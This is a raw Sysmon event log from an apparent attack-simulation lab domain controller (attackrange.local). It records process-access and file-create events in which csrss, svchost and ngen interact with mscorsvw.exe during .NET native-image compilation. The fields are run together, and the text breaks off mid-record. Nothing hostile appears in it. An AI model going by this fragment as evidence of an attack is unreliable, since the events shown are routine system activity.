13:51:27.538{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:27.538{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000008751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:27.413{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b34-0\System.Web.Extensions.dll2021-01-18 13:51:27.413 11241100x80000000000000008776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:51:28.975{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ac0-0\System.Web.Entity.Design.dll2021-01-18 13:51:28.975 10341000x80000000000000008775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.772{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.756{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.756{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8304-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8204-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.663{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8204-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.663{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8204-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:28.600{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1210-0\System.Web.Entity.dll2021-01-18 13:51:28.600 10341000x80000000000000008768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.366{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.366{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8104-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.303{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-8004-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.303{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-8004-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.303{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-8004-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:28.241{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a20-0\System.Web.DynamicData.Design.dll2021-01-18 13:51:28.241 10341000x80000000000000008761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.163{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.147{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.147{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-7F04-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.084{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9260-6005-7E04-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:28.069{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9260-6005-7E04-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:28.069{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9260-6005-7E04-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.959{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.959{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.959{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(